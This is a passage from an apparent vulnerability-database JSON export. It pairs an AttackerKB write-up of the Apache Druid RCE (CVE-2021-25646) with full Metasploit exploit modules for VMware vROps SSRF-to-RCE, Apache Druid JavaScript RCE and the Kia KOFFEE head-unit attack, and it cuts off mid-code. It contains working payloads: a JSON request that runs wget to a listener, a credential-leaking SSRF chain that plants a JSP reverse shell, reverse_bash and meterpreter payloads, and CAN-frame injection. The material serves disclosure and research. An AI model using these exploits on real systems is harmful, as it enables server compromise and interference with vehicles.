day\",\"spec\":\"{\\\"type\\\":\\\"index_parallel\\\",\\\"ioConfig\\\":{\\\"type\\\":\\\"index_parallel\\\",\\\"firehose\\\":{\\\"type\\\":\\\"http\\\",\\\"uris\\\":[\\\"https://druid.apache.org/data/wikipedia.json.gz\\\"]}},\\\"tuningConfig\\\":{\\\"type\\\":\\\"index_parallel\\\"},\\\"dataSchema\\\":{\\\"dataSource\\\":\\\"new-data-source\\\",\\\"granularitySpec\\\":{\\\"type\\\":\\\"uniform\\\",\\\"segmentGranularity\\\":\\\"DAY\\\",\\\"queryGranularity\\\":\\\"HOUR\\\"}}}\"},\"parsed\":{\"__time\":1262304000000,\"name\":\"Wikipedia Edits\",\"description\":\"Edits on Wikipedia from one day\",\"spec\":\"{\\\"type\\\":\\\"index_parallel\\\",\\\"ioConfig\\\":{\\\"type\\\":\\\"index_parallel\\\",\\\"firehose\\\":{\\\"type\\\":\\\"http\\\",\\\"uris\\\":[\\\"https://druid.apache.org/data/wikipedia.json.gz\\\"]}},\\\"tuningConfig\\\":{\\\"type\\\":\\\"index_parallel\\\"},\\\"dataSchema\\\":{\\\"dataSource\\\":\\\"new-data-source\\\",\\\"granularitySpec\\\":{\\\"type\\\":\\\"uniform\\\",\\\"segmentGranularity\\\":\\\"DAY\\\",\\\"queryGranularity\\\":\\\"HOUR\\\"}}}\"}}]}* Closing connection 0\n wvu@kharak:~/Downloads$\n \n \n \n wvu@kharak:~$ ncat -lkv 8080\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Listening on :::8080\n Ncat: Listening on 0.0.0.0:8080\n Ncat: Connection from 192.168.123.1.\n Ncat: Connection from 192.168.123.1:56727.\n GET / HTTP/1.1\n Host: 192.168.123.1:8080\n User-Agent: Wget\n Connection: close\n \n\n`payload.json` is adapted from [this PoC](<https://gist.github.com/pikpikcu/d208f19ea222efe21c4a6e6003d57069>), then formatted with [jq](<https://stedolan.github.io/jq/>).\n \n \n wvu@kharak:~/Downloads$ cat payload.json\n {\n \"type\": \"index\",\n \"spec\": {\n \"type\": \"index\",\n \"ioConfig\": {\n \"type\": \"index\",\n \"inputSource\": {\n \"type\": \"http\",\n \"uris\": [\n \"https://druid.apache.org/data/example-manifests.tsv\"\n ]\n },\n \"inputFormat\": {\n \"type\": \"tsv\",\n \"findColumnsFromHeader\": true\n }\n },\n \"dataSchema\": {\n \"dataSource\": \"sample\",\n \"timestampSpec\": {\n \"column\": \"timestamp\",\n \"missingValue\": \"2010-01-01T00:00:00Z\"\n },\n \"dimensionsSpec\": {},\n \"transformSpec\": {\n \"transforms\": [],\n \"filter\": {\n \"type\": \"javascript\",\n \"function\": \"function(value){return java.lang.Runtime.getRuntime().exec('wget http://192.168.123.1:8080/')}\",\n \"dimension\": \"added\",\n \"\": {\n \"enabled\": \"true\"\n }\n }\n }\n },\n \"tuningConfig\": {\n \"type\": \"index\"\n }\n },\n \"samplerConfig\": {\n \"numRows\": 50,\n \"timeoutMs\": 10000\n }\n }\n wvu@kharak:~/Downloads$\n \n\nSome references for creating your own PoC:\n\n * <https://druid.apache.org/docs/latest/tutorials/tutorial-transform-spec.html> \n\n * <https://druid.apache.org/docs/latest/querying/filters.html>\n\n**space-r7** at April 12, 2021 1:38pm UTC reported:\n\nFrom Wikipedia:\n\n> **Druid is a column-oriented, open-source, distributed data store written in Java.** Druid is designed to quickly ingest massive quantities of event data, and provide low-latency queries on top of the data.[1] The name Druid comes from the shapeshifting Druid class in many role-playing games, to reflect the fact that the architecture of the system can shift to solve different types of data problems.\n> \n> Druid is commonly used in business intelligence/OLAP applications to analyze high volumes of real-time and historical data.[2] **Druid is used in production by technology companies such as Alibaba,[2] Airbnb,[2] Cisco,[3][2] eBay,[4] Lyft,[5] Netflix,[6] PayPal,[2] Pinterest,[7] Twitter,[8] Walmart,[9] Wikimedia Foundation[10] and Yahoo.[11]**\n\nContrary to the CVE description, this appears to be both **unauthenticated** and **vulnerable in the default configuration** of Apache Druid 0.20.0, at least [from Docker](<https://druid.apache.org/docs/latest/tutorials/docker.html>)?\n \n \n wvu@kharak:~/Downloads$ curl -vH \"Content-Type: application/json\" http://127.0.0.1:8888/druid/indexer/v1/sampler -d @payload.json\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)\n > POST /druid/indexer/v1/sampler HTTP/1.1\n > Host: 127.0.0.1:8888\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json\n > Content-Length: 949\n >\n * upload completely sent off: 949 out of 949 bytes\n < HTTP/1.1 200 OK\n < Date: Sat, 06 Feb 2021 02:23:07 GMT\n < Date: Sat, 06 Feb 2021 02:23:07 GMT\n < Content-Type: application/json\n < Vary: Accept-Encoding, User-Agent\n < Content-Length: 999\n <\n * Connection #0 to host 127.0.0.1 left intact\n {\"numRowsRead\":1,\"numRowsIndexed\":1,\"data\":[{\"input\":{\"name\":\"Wikipedia Edits\",\"description\":\"Edits on Wikipedia from one day\",\"spec\":\"{\\\"type\\\":\\\"index_parallel\\\",\\\"ioConfig\\\":{\\\"type\\\":\\\"index_parallel\\\",\\\"firehose\\\":{\\\"type\\\":\\\"http\\\",\\\"uris\\\":[\\\"https://druid.apache.org/data/wikipedia.json.gz\\\"]}},\\\"tuningConfig\\\":{\\\"type\\\":\\\"index_parallel\\\"},\\\"dataSchema\\\":{\\\"dataSource\\\":\\\"new-data-source\\\",\\\"granularitySpec\\\":{\\\"type\\\":\\\"uniform\\\",\\\"segmentGranularity\\\":\\\"DAY\\\",\\\"queryGranularity\\\":\\\"HOUR\\\"}}}\"},\"parsed\":{\"__time\":1262304000000,\"name\":\"Wikipedia Edits\",\"description\":\"Edits on Wikipedia from one day\",\"spec\":\"{\\\"type\\\":\\\"index_parallel\\\",\\\"ioConfig\\\":{\\\"type\\\":\\\"index_parallel\\\",\\\"firehose\\\":{\\\"type\\\":\\\"http\\\",\\\"uris\\\":[\\\"https://druid.apache.org/data/wikipedia.json.gz\\\"]}},\\\"tuningConfig\\\":{\\\"type\\\":\\\"index_parallel\\\"},\\\"dataSchema\\\":{\\\"dataSource\\\":\\\"new-data-source\\\",\\\"granularitySpec\\\":{\\\"type\\\":\\\"uniform\\\",\\\"segmentGranularity\\\":\\\"DAY\\\",\\\"queryGranularity\\\":\\\"HOUR\\\"}}}\"}}]}* Closing connection 0\n wvu@kharak:~/Downloads$\n \n \n \n wvu@kharak:~$ ncat -lkv 8080\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Listening on :::8080\n Ncat: Listening on 0.0.0.0:8080\n Ncat: Connection from 192.168.123.1.\n Ncat: Connection from 192.168.123.1:56727.\n GET / HTTP/1.1\n Host: 192.168.123.1:8080\n User-Agent: Wget\n Connection: close\n \n\n`payload.json` is adapted from [this PoC](<https://gist.github.com/pikpikcu/d208f19ea222efe21c4a6e6003d57069>), then formatted with [jq](<https://stedolan.github.io/jq/>).\n \n \n wvu@kharak:~/Downloads$ cat payload.json\n {\n \"type\": \"index\",\n \"spec\": {\n \"type\": \"index\",\n \"ioConfig\": {\n \"type\": \"index\",\n \"inputSource\": {\n \"type\": \"http\",\n \"uris\": [\n \"https://druid.apache.org/data/example-manifests.tsv\"\n ]\n },\n \"inputFormat\": {\n \"type\": \"tsv\",\n \"findColumnsFromHeader\": true\n }\n },\n \"dataSchema\": {\n \"dataSource\": \"sample\",\n \"timestampSpec\": {\n \"column\": \"timestamp\",\n \"missingValue\": \"2010-01-01T00:00:00Z\"\n },\n \"dimensionsSpec\": {},\n \"transformSpec\": {\n \"transforms\": [],\n \"filter\": {\n \"type\": \"javascript\",\n \"function\": \"function(value){return java.lang.Runtime.getRuntime().exec('wget http://192.168.123.1:8080/')}\",\n \"dimension\": \"added\",\n \"\": {\n \"enabled\": \"true\"\n }\n }\n }\n },\n \"tuningConfig\": {\n \"type\": \"index\"\n }\n },\n \"samplerConfig\": {\n \"numRows\": 50,\n \"timeoutMs\": 10000\n }\n }\n wvu@kharak:~/Downloads$\n \n\nSome references for creating your own PoC:\n\n * <https://druid.apache.org/docs/latest/tutorials/tutorial-transform-spec.html> \n\n * <https://druid.apache.org/docs/latest/querying/filters.html>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-29T00:00:00", "type": "attackerkb", "title": "CVE-2021-25646", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2021-02-02T00:00:00", "id": "AKB:0E681F53-D1E0-4F8C-8799-7801D5905A7D", "href": "https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-11-02T03:03:48", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-11-03T04:46:13", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests; however, that feature is disabled by default. In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request that both enables the JavaScript code-execution feature and executes the supplied code all at once, allowing for code execution on the server with the privileges of the Druid Server process. More critically, authentication is not enabled in Apache Druid by default. Tested on the following Apache Druid versions: * 0.15.1 * 0.16.0-iap8 * 0.17.1 * 0.18.0-iap3 * 0.19.0-iap7 * 0.20.0-iap4.1 * 0.20.0 * 0.21.0-iap3\n", "cvss3": {}, "published": "2021-03-31T12:43:28", "type": "metasploit", "title": "Apache Druid 0.20.0 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25646"], "modified": "2022-04-19T20:42:23", "id": "MSF:EXPLOIT-LINUX-HTTP-APACHE_DRUID_JS_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/apache_druid_js_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Druid 0.20.0 Remote Command Execution',\n 'Description' => %q{\n Apache Druid includes the ability to execute user-provided JavaScript code embedded in\n various types of requests; however, that feature is disabled by default.\n\n In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request\n that both enables the JavaScript code-execution feature and executes the supplied code all\n at once, allowing for code execution on the server with the privileges of the Druid Server process.\n More critically, authentication is not enabled in Apache Druid by default.\n\n Tested on the following Apache Druid versions:\n\n * 0.15.1\n * 0.16.0-iap8\n * 0.17.1\n * 0.18.0-iap3\n * 0.19.0-iap7\n * 0.20.0-iap4.1\n * 0.20.0\n * 0.21.0-iap3\n },\n 'Author' => [\n 'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery\n 'je5442804' # Metasploit module\n ],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'References' => [\n ['CVE', '2021-25646'],\n ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],\n ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']\n ],\n 'DisclosureDate' => '2021-01-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Targets' => [\n [\n 'Linux (dropper)', {\n 'Platform' => 'linux',\n 'Type' => :linux_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' },\n 'CmdStagerFlavor' => %w[curl wget],\n 'Arch' => [ARCH_X86, ARCH_X64]\n }\n ],\n [\n 'Unix (in-memory)', {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8888),\n OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/'])\n ])\n end\n\n def execute_command(cmd, _opts = {})\n gencmd = '/bin/sh`@~-c`@~' + cmd\n genvar = Rex::Text.rand_text_alpha(8..12)\n genname = Rex::Text.rand_text_alpha(8..12)\n vprint_status(\"cmd= #{gencmd} var=#{genvar} name=#{genname}\")\n post_data = {\n type: 'index',\n spec: {\n ioConfig: {\n type: 'index',\n firehose: {\n type: 'local',\n baseDir: '/etc',\n filter: 'passwd'\n }\n },\n dataSchema: {\n dataSource: Rex::Text.rand_text_alpha(8..12),\n parser: {\n parseSpec: {\n format: 'javascript',\n timestampSpec: {},\n dimensionsSpec: {},\n function: \"function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"#{gencmd}\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"#{rand(1..9999999)}\\\",#{genname}: #{genvar}}}\",\n \"\": {\n enabled: 'true'\n }\n }\n }\n }\n },\n samplerConfig: {\n numRows: 10\n }\n }.to_json\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'),\n 'ctype' => 'application/json',\n 'headers' => {\n 'Accept' => 'application/json, text/plain, */*'\n },\n 'data' => post_data\n })\n end\n\n def check\n genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a')\n\n vprint_status(\"Attempting to execute 'echo #{genecho}' on the target.\")\n res = execute_command(\"echo #{genecho}\")\n unless res\n return CheckCode::Unknown('Connection failed.')\n end\n\n unless res.code == 200\n return CheckCode::Safe\n end\n\n if res.body.include?(genecho)\n return CheckCode::Vulnerable\n end\n\n CheckCode::Unknown('Target does not seem to be running Apache Druid.')\n end\n\n def exploit\n case target['Type']\n when :linux_dropper\n execute_cmdstager\n when :unix_memory\n execute_command(payload.encoded)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_druid_js_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-08T15:40:44", "description": "This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-07T09:33:53", "type": "metasploit", "title": "KOFFEE - Kia OFFensivE Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8539"], "modified": "2023-02-08T11:45:17", "id": "MSF:POST-ANDROID-LOCAL-KOFFEE-", "href": "https://www.rapid7.com/db/modules/post/android/local/koffee/", "sourceData": "# frozen_string_literal: true\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'KOFFEE - Kia OFFensivE Exploit',\n 'Description' => %q{\n This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to\n attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on\n SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an\n active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head\n unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.\n },\n 'SessionTypes' => ['meterpreter'],\n 'Author' => [\n 'Gianpiero Costantino',\n 'Ilaria Matteucci'\n ],\n 'References' => [\n ['CVE', '2020-8539'],\n ['URL', 'https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf']\n ],\n 'Actions' => [\n [ 'TOGGLE_RADIO_MUTE', { 'Description' => 'It mutes/umutes the radio' } ],\n [ 'REDUCE_RADIO_VOLUME', { 'Description' => 'It decreases the radio volume' } ],\n [ 'MAX_RADIO_VOLUME', { 'Description' => 'It sets the radio volume to the max' } ],\n [ 'LOW_SCREEN_BRIGHTNESS', { 'Description' => 'It decreases the head unit screen brightness' } ],\n [ 'HIGH_SCREEN_BRIGHTNESS', { 'Description' => 'It increases the head unit screen brightness' } ],\n [ 'LOW_FUEL_WARNING', { 'Description' => 'It pops up a low fuel message on the head unit' } ],\n [ 'NAVIGATION_FULL_SCREEN', { 'Description' => 'It pops up the navigation app window' } ],\n [ 'SET_NAVIGATION_ADDRESS', { 'Description' => 'It pops up the navigation address window' } ],\n [ 'SEEK_DOWN_SEARCH', { 'Description' => 'It triggers the seek down radio frequency search' } ],\n [ 'SEEK_UP_SEARCH', { 'Description' => 'It triggers the seek up radio frequency search' } ],\n [ 'SWITCH_ON_HU', { 'Description' => 'It switches on the head unit' } ],\n [ 'SWITCH_OFF_HU', { 'Description' => 'It switches off the head unit' } ],\n [ 'CAMERA_REVERSE_ON', { 'Description' => 'It shows the parking camera video stream' } ],\n [ 'CAMERA_REVERSE_OFF', { 'Description' => 'It hides the parking camera video stream' } ],\n [ 'CLUSTER_CHANGE_LANGUAGE', { 'Description' => 'It changes the cluster language' } ],\n [ 'CLUSTER_SPEED_LIMIT', { 'Description' => 'It changes the speed limit shown in the instrument cluster' } ],\n [ 'CLUSTER_ROUNDABOUT_FARAWAY', { 'Description' => 'It shows a round about signal with variable distance in the instrument cluster ' } ],\n [ 'CLUSTER_RANDOM_NAVIGATION', { 'Description' => 'It shows navigation signals in the instrument cluster ' } ],\n [ 'CLUSTER_RADIO_INFO', { 'Description' => 'It shows radio info in the instrument cluster ' } ],\n [ 'INJECT_CUSTOM', { 'Description' => 'It injects custom micom payloads' } ]\n ],\n 'DefaultAction' => 'TOGGLE_RADIO_MUTE',\n 'Platform' => 'Android',\n 'DisclosureDate' => '2020-12-02',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [SCREEN_EFFECTS, CONFIG_CHANGES, IOC_IN_LOGS],\n 'Reliability' => []\n }\n )\n )\n register_options([\n OptString.new('MICOMD', [true, 'Path to micomd executable', '/system/bin/micomd']),\n OptString.new('PERIOD', [true, 'Time (ms) interval between two MICOM commands, aka Period of CAN frames', '0.200']),\n OptInt.new('NUM_MSG', [true, 'Number of MICOM commands sent each time', '5']),\n OptString.new('CMD_PAYLOAD', [ false, 'Micom payload to inject, e.g., cmd byte1 byte3 byte2', '00 00 00'], conditions: %w[ACTION == INJECT_CUSTOM]),\n ])\n end\n\n def send_in(m_cmd)\n cmd = \"#{datastore['MICOMD']} -c inject #{m_cmd}\"\n cmd_exec(cmd)\n print_good(' -- Command Sent -- ')\n end\n\n def send_out(m_cmd)\n cmd = \"#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}\"\n cmd_exec(cmd)\n print_good(' -- Command Sent -- ')\n end\n\n def send_custom(m_cmd)\n cmd = \"#{datastore['MICOMD']} -c inject #{m_cmd}\"\n var = 0\n while var < datastore['NUM_MSG'].to_s.to_i\n cmd_exec(cmd)\n var += 1\n print_status(\"> Sending #{var} out of #{datastore['NUM_MSG']}\")\n sleep(datastore['PERIOD'].to_s.to_f)\n end\n print_good(' -- Custom payload Sent-- ')\n end\n\n def send_out_custom(m_cmd)\n cmd = \"#{datastore['MICOMD']} -c inject-outgoing #{m_cmd}\"\n var = 0\n while var < datastore['Num_msg'].to_s.to_i\n cmd_exec(cmd)\n var += 1\n print_status(\"> Sending #{var} out of #{datastore['NUM_MSG']}\")\n sleep(datastore['PERIOD'].to_s.to_f)\n end\n print_good(' -- CAN bus frames sent-- ')\n end\n\n def run\n # all conditional options are required when active, make sure none of them are blank\n options.each_pair do |name, option|\n next if 